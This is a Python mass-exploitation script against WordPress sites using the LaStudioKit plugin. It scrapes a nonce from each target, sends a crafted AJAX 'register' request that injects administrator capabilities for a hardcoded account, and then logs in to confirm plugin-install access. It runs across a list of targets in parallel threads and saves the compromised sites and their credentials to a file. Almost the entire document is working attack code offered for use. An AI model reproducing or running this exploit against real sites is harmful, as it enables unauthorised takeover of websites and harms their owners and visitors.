import threading import requests import random import os import sys import urllib3 import warnings from queue import Queue from colorama import init, Fore, Style import re import time # ======================= Init ======================= init(autoreset=True) os.environ["NO_PROXY"] = "*" urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning) TELEGRAM_HANDLE = "@KNxploited" GITHUB_HANDLE = "Nxploited" # Credentials used in exploit ADMIN_EMAIL = "adminSA12@exploit.com" # يمكنك تعديله ADMIN_PASSWORD = "adminSA" # يمكنك تعديله ADMIN_USERNAME = "Nx_admin" # يمكنك تعديله RESULT_FILE = "success_results.txt" MAX_THREADS = 50 BANNER = f"""{Fore.CYAN} _____ _____ ___ __ ___ __ __ ___ ___ __ / __\\ \\ / / __|_|_ ) \\_ )/ / ___ / \\/ _ \\_ ) \\ | (__ \\ V /| _|___/ / () / // _ \\___| () \\_, // / () | \\___| \\_/ |___| /___\\__/___\\___/ \\__/ /_//___\\__/ {Style.RESET_ALL}{Fore.MAGENTA} ------------------------------------------------------------ By: Nxploited | GitHub: {GITHUB_HANDLE} ------------------------------------------------------------ {Style.RESET_ALL} """ # ======================= Logging helpers ======================= def log_info(site, msg): ts = time.strftime("%H:%M:%S") print(f"[{ts}] {Fore.CYAN}[*]{Style.RESET_ALL} {site} - {msg}") def log_ok(site, msg): ts = time.strftime("%H:%M:%S") print(f"[{ts}] {Fore.GREEN}[+]{Style.RESET_ALL} {site} - {msg}") def log_warn(site, msg): ts = time.strftime("%H:%M:%S") print(f"[{ts}] {Fore.YELLOW}[!]{Style.RESET_ALL} {site} - {msg}") def log_err(site, msg): ts = time.strftime("%H:%M:%S") print(f"[{ts}] {Fore.RED}[-]{Style.RESET_ALL} {site} - {msg}") # ======================= Helpers ======================= def random_user_agent(): agents = [ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 " "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 " "(KHTML, like Gecko) Version/14.1.2 Safari/605.1.15", ] return random.choice(agents) def normalize_base(site: str) -> str: site = site.strip() if not site.startswith(("http://", "https://")): site = "https://" + site return site.rstrip("/") # ======================= ajaxNonce extraction ======================= def extract_ajax_nonce(site: str, timeout: int = 10) -> str | None: """ يحاول استخراج ajaxNonce من أكثر من شكل وأكثر من مسار: - "ajaxNonce": "value" - ajaxNonce: "value" - data-ajaxnonce / data-ajax-nonce داخل HTML attributes """ base = normalize_base(site) headers = {"User-Agent": random_user_agent()} # توسيع المسارات الشائعة للـ front page paths = [ "", "/", "/index.php", "/home", "/start", "/?page_id=1", ] for path in paths: url = base + path try: resp = requests.get(url, headers=headers, timeout=timeout, verify=False) except Exception: continue if resp.status_code != 200: continue html = resp.text # 1) الشكل الكلاسيكي في JSON/JS m = re.search(r'"ajaxNonce"\s*:\s*"([a-zA-Z0-9_-]{5,})"', html) if m: return m.group(1) # 2) أنماط أخرى في السكربت أو الـ data-attributes patterns = [ r"ajaxNonce['\"]?\s*:\s*['\"]([a-zA-Z0-9_-]{5,})['\"]", r"['\"]ajaxNonce['\"]\s*[:=]\s*['\"]([a-zA-Z0-9_-]{5,})['\"]", r"data-ajaxnonce=['\"]([a-zA-Z0-9_-]{5,})['\"]", r"data-ajax-nonce=['\"]([a-zA-Z0-9_-]{5,})['\"]", ] for pat in patterns: m2 = re.search(pat, html, re.IGNORECASE) if m2: return m2.group(1) return None # ======================= Exploit request ======================= def lakit_register_admin( site: str, nonce: str, email: str, password: str, username: str, timeout: int = 15, ) -> tuple[int, str]: """ تنفيذ استغلال LaStudioKit: - entrypoint: /wp-admin/admin-ajax.php?action=lakit_ajax&_nonce= - action: register - data: * email / password / username * lakit_field_log = "yes" -> استخدام الـ username المُرسل * lakit_field_pwd = "yes" -> استخدام الـ password المُرسل * lakit_field_cpwd = "no" -> تعطيل شرط password-confirm * lakit_bkrole != empty -> تفعيل فلتر حقن meta (wp_capabilities=['administrator'=>1]) * lakit_recaptcha_response = "" (reCAPTCHA v3 غالبًا غير مفعّلة افتراضيًا) """ base = normalize_base(site) endpoint = f"{base}/wp-admin/admin-ajax.php" sess = requests.Session() sess.verify = False sess.headers.update( { "User-Agent": random_user_agent(), "Accept": "*/*", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", } ) actions_payload = ( "{" '"req1":{' '"action":"register",' '"data":{' f'"email":"{email}",' f'"password":"{password}",' f'"username":"{username}",' '"lakit_field_log":"yes",' '"lakit_field_pwd":"yes",' '"lakit_field_cpwd":"no",' '"lakit_bkrole":"1",' '"lakit_recaptcha_response":""' "}" "}" "}" ) data = { "action": "lakit_ajax", "_nonce": nonce, "actions": actions_payload, } try: r = sess.post(endpoint, data=data, timeout=timeout, allow_redirects=True) except Exception as e: return 0, f"REQUEST_EXCEPTION: {e}" return r.status_code, (r.text or "") # ======================= Strong admin verification ======================= def verify_full_admin(site: str, username: str, password: str, timeout: int = 10) -> bool: base = normalize_base(site) login_url = f"{base}/wp-login.php" sess = requests.Session() sess.verify = False headers = {"User-Agent": random_user_agent()} try: sess.get(login_url, timeout=timeout, verify=False, headers=headers) except Exception: pass login_data = { "log": username.strip(), "pwd": password, "wp-submit": "Log In", "testcookie": "1", } headers = { "User-Agent": random_user_agent(), "Cookie": "wordpress_test_cookie=WP Cookie check", "Content-Type": "application/x-www-form-urlencoded", "Referer": login_url, } try: r = sess.post( login_url, data=login_data, headers=headers, timeout=timeout, verify=False, allow_redirects=True, ) except Exception: return False content = (r.text or "").lower() failure_indicators = [ "incorrect username or password", "invalid username", "invalid password", "error: the username", "is not registered", "authentication failed", "login failed", "unknown username", "error: the password you entered", ] if any(ind in content for ind in failure_indicators): return False success_indicators = [ "dashboard", "wp-admin-bar", "adminmenu", "wp-admin/index.php", "wp-admin/profile.php", ] could_be_logged_in = any(ind in content for ind in success_indicators) cookie_header = r.headers.get("Set-Cookie", "") if "wordpress_logged_in" in cookie_header or any( c.name.startswith("wordpress_logged_in") for c in sess.cookies ): could_be_logged_in = True if not could_be_logged_in: return False admin_urls = [ f"{base}/wp-admin/plugin-install.php", f"{base}/wp-admin/plugin-install.php?tab=upload", f"{base}/wp-admin/plugins.php?page=plugin-install", ] try: for u in admin_urls: try: rr = sess.get( u, timeout=timeout, verify=False, headers={"User-Agent": random_user_agent()}, allow_redirects=False, ) except Exception: continue if rr.status_code == 200 and "wp-login.php" not in (rr.url or ""): txt = (rr.text or "").lower() installation_indicators = [ "plugin-install-tab", "upload-plugin", "plugin-upload-form", "install-plugin-upload", "pluginzip", "browse plugins", "add plugins", ] if any(ind in txt for ind in installation_indicators): return True elif rr.status_code in (301, 302): loc = rr.headers.get("Location", "") if "wp-login.php" in loc: return False except Exception: pass return False # ======================= Worker ======================= def worker(thread_id, targets_chunk, out_queue): for site in targets_chunk: base = normalize_base(site) try: print(Fore.BLUE + "-" * 70 + Style.RESET_ALL) log_info(base, "Starting target") nonce = extract_ajax_nonce(base) if not nonce: log_warn(base, "kay not found") out_queue.put(("failed", site, "nonce-not-found")) continue log_ok(base, f"kay: {nonce}") status_code, resp_text = lakit_register_admin( base, nonce, ADMIN_EMAIL, ADMIN_PASSWORD, ADMIN_USERNAME ) log_info(base, f"AJAX HTTP status: {status_code}") # إزالة طباعة الرد الخام لتقليل الضوضاء في الترمنال # print(Fore.MAGENTA + f"==== RAW AJAX RESPONSE ({base}) ====" + Style.RESET_ALL) # print(resp_text) # print(Fore.MAGENTA + "==== END RAW AJAX RESPONSE ====\n" + Style.RESET_ALL) if status_code != 200: log_warn(base, "Non-200 HTTP status from admin-ajax") out_queue.put(("failed", site, f"http-{status_code}")) continue low = resp_text.lower() response_success = False success_markers = [ "created successfully", '"success":true', "'success':true", '"type":"success"', '"status":"success"', ] if any(m in low for m in success_markers): response_success = True log_ok(base, "AJAX response indicates success") login_ok = verify_full_admin(base, ADMIN_USERNAME, ADMIN_PASSWORD) log_info( base, f"Full admin verification (login + plugin install access): " f"{'OK' if login_ok else 'FAIL'}", ) if response_success and login_ok: print(Fore.GREEN + "=" * 60 + Style.RESET_ALL) print(Fore.GREEN + "[ SUCCESS BLOCK ]" + Style.RESET_ALL) print( f"{Fore.GREEN}Site :{Style.RESET_ALL} {base}\n" f"{Fore.GREEN}Result :{Style.RESET_ALL} SUCCESS\n" f"{Fore.GREEN}AJAX OK :{Style.RESET_ALL} YES\n" f"{Fore.GREEN}FULL ADMIN :{Style.RESET_ALL} YES (login + plugin install access)" ) print(Fore.GREEN + "=" * 60 + Style.RESET_ALL) status_line = ( f"{base} | USERNAME:{ADMIN_USERNAME} | EMAIL:{ADMIN_EMAIL} " f"| PASSWORD:{ADMIN_PASSWORD} " f"| LOGIN:FULL_ADMIN_OK " f"| RESP_SUCCESS:YES " f"| NONCE:{nonce}" ) write_result(RESULT_FILE, status_line) out_queue.put(("success", site)) elif response_success and not login_ok: log_warn( base, "AJAX indicates success but full admin verification failed " "(maybe account created without admin capabilities or mail/activation flow).", ) out_queue.put(("failed", site, "ajax-success-login-failed")) elif not response_success and login_ok: log_warn( base, "Full admin login OK but no AJAX success marker " "(possible pre-existing admin user or custom response).", ) out_queue.put(("failed", site, "login-success-no-ajax-marker")) else: log_warn(base, "No AJAX success marker and full admin verification failed") out_queue.put(("failed", site, "no-success-marker-and-login-failed")) except Exception as e: log_err(base, f"Exception: {e}") out_queue.put(("failed", site, "exception")) # ======================= Utils ======================= def chunkify(lst, n): if n <= 0: n = 1 return [lst[i::n] for i in range(n)] def write_result(filename, data): with open(filename, "a", encoding="utf-8") as f: f.write(data + "\n") def read_targets(filename): targets = [] try: with open(filename, "r", encoding="utf-8") as f: for line in f: url = line.strip() if url: targets.append(url) except FileNotFoundError: print(f"Targets file not found: {filename}") sys.exit(1) return targets # ======================= Output helpers ======================= def print_success_global(): print(Fore.GREEN + "\n" + "#" * 60 + Style.RESET_ALL) print( Fore.GREEN + "# Exploit finished: some targets reported SUCCESS. #" + Style.RESET_ALL ) print( Fore.GREEN + f"# Results saved to: {RESULT_FILE:<35}#" + Style.RESET_ALL ) print(Fore.GREEN + "#" * 60 + Style.RESET_ALL) def print_failed_global(): print(Fore.RED + "\nNo successful targets detected." + Style.RESET_ALL) def printer_loop(queue): any_success = False while True: item = queue.get() if item is None: break typ = item[0] if typ == "success": any_success = True if any_success: print_success_global() else: print_failed_global() # ======================= Main ======================= def main(): print(BANNER) print( Fore.CYAN + " LaStudioKit Admin Register (Refined Exploit + Strong Verification)" + Style.RESET_ALL ) print(Fore.CYAN + "-" * 70 + Style.RESET_ALL) list_file = input("Enter targets list filename (e.g. list.txt): ").strip() if not list_file: list_file = "list.txt" try: num_threads = int(input("Enter number of threads (1-50): ").strip()) num_threads = max(1, min(num_threads, MAX_THREADS)) except Exception: num_threads = 10 targets = read_targets(list_file) if not targets: print("No targets loaded.") sys.exit(1) safe_threads = min(num_threads, max(1, min(MAX_THREADS, len(targets)))) queue = Queue() threads = [] chunks = chunkify(targets, safe_threads) printer = threading.Thread(target=printer_loop, args=(queue,), daemon=True) printer.start() for i in range(safe_threads): th = threading.Thread(target=worker, args=(i, chunks[i], queue), daemon=True) th.start() threads.append(th) for th in threads: th.join() queue.put(None) printer.join() if __name__ == "__main__": main()